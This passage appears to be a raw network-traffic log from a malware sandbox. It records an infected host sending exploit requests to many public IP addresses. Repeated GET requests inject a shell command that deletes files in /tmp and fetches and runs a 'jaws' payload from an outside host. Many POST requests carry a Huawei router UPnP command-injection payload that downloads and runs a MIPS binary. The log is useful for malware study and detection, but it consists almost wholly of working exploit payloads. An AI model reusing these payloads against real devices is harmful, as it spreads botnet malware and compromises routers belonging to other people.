                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    20192.168.2.2360278123.52.192.12380
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045274019 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    21192.168.2.235915682.120.56.1080
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045299053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    22192.168.2.2359862111.235.227.10380
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045320034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    23192.168.2.2337200198.53.211.16780
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045331001 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    24192.168.2.2342460146.63.138.24680
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045362949 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    25192.168.2.233585481.114.132.6480
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045384884 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    26192.168.2.235193264.182.50.2880
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045414925 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    27192.168.2.234281673.36.157.5380
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045438051 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    28192.168.2.233943868.184.62.24980
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045459032 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    29192.168.2.2336418208.239.12.18980
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045485020 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    30192.168.2.2359076177.233.205.20180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045501947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    31192.168.2.2345350143.150.243.10180
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.045521975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                    User-Agent: Hello, world
                                                    Host: 127.0.0.1:80
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                    Connection: keep-alive


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    32192.168.2.234646441.155.219.17837215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.800395966 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    33192.168.2.2348344197.123.157.2437215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.800611019 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    34192.168.2.2359634156.205.236.937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.800676107 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    35192.168.2.2349108156.75.54.18637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.800761938 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    36192.168.2.2351570156.31.133.22237215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.800875902 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    37192.168.2.234062641.42.112.9037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.800983906 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    38192.168.2.2343964197.3.154.23537215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801039934 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    39192.168.2.2358514197.112.141.25037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801121950 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    40192.168.2.2340266156.155.195.25337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.801218987 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
